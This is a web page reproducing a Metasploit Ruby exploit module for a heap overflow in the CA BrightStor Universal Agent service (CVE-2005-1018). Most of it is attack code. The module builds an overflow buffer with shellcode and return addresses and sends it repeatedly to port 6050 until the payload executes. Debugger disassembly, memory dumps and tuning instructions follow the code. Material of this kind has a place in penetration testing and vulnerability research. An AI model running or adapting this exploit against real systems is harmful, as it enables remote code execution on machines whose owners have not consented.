扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 |
## # $Id: universal_agent.rb 9583 2010-06-22 19:11:05Z todb $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'CA BrightStor Universal Agent Overflow', 'Description'=> %q{ This module exploits a convoluted heap overflow in the CA BrightStor Universal Agent service. Triple userland exception results in heap growth and execution of dereferenced function pointer at a specified address. }, 'Author' => [ 'hdm' ], 'License'=> MSF_LICENSE, 'Version'=> '$Revision: 9583 $', 'References' => [ [ 'CVE', '2005-1018'], [ 'OSVDB', '15471' ], [ 'BID', '13102'], [ 'URL', 'http://www.idefense.com/application/poi/display?id=232&type=vulnerabilities'], ], 'Privileged' => true, 'Payload'=> { # 250 bytes of space (bytes 0xa5 -> 0xa8 = reversed) 'Space'=> 164, 'BadChars' => "\x00", 'StackAdjustment' => -3500, }, 'Targets'=> [ [ 'Magic Heap Target #1', { 'Platform' => 'win', 'Ret'=> 0x01625c44, # We grow to our own return address }, ], ], 'DisclosureDate' => 'Apr 11 2005', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(6050) ], self.class) end def exploit print_status("Trying target #{target.name}...") # The server reverses four bytes starting at offset 0xa5 :0 # Create the overflow string boom = 'X' * 1024 # Required field to trigger the fault boom[248, 2] = [1000].pack('V') # The shellcode, limited to 250 bytes (no nulls) boom[256, payload.encoded.length] = payload.encoded # This should point to itself boom[576, 4] = [target.ret].pack('V') # This points to the code below boom[580, 4] = [target.ret + 8].pack('V') # We have 95 bytes, use it to hop back to shellcode boom[584, 6] = "\x68" + [target.ret - 320].pack('V') + "\xc3" # Stick the protocol header in front of our request req = "\x00\x00\x00\x00\x03\x20\xa8\x02" + boom # We keep making new connections and triggering the fault until # the heap is grown to encompass our known return address. Once # this address has been allocated and filled, each subsequent # request will result in our shellcode being executed. 1.upto(200) {|i| connect print_status("Sending request #{i} of 200...") if (i % 10) == 0 sock.put(req) disconnect # Give the process time to recover from each exception select(nil,nil,nil,0.1); } handler end end __END__ 012a0d91 8b8e445c0000 mov ecx,[esi+0x5c44] 012a0d97 83c404 add esp,0x4 012a0d9a 85c9 testecx,ecx 012a0d9c 7407 jzntagent+0x20da5 (012a0da5) 012a0d9e 8b11 mov edx,[ecx] ds:0023:41327441=??????? 012a0da0 6a01 push0x1 012a0da2 ff5204 calldword ptr [edx+0x4] Each request will result in another chunk being allocated, the exception causes these chunks to never be freed. The large chunk size allows us to predict the location of our buffer and grow our buffer to where we need it. If these addresses do not match up, run this exploit, then attach with WinDbg: > s 0 Lfffffff 0x44 0x5c 0x61 0x01 Figure out the pattern, replace the return address, restart the service, and run it through again. Only tested on WinXP SP1 011b5c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b......... 011c5c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b......... 011d5c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b......... 011e5c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b......... 011f5c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b......... 01205c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b......... [ snip ] 01605c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b......... 01615c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b......... 01625c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b......... 01635c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b......... 01645c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b......... 01655c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b......... 01665c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b......... 01675c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b......... 01685c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b......... 01695c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b......... 016a5c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b......... 016b5c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b......... 016c5c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b......... 016d5c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b......... 01725c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b......... 017e5c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b......... |
体验盒子
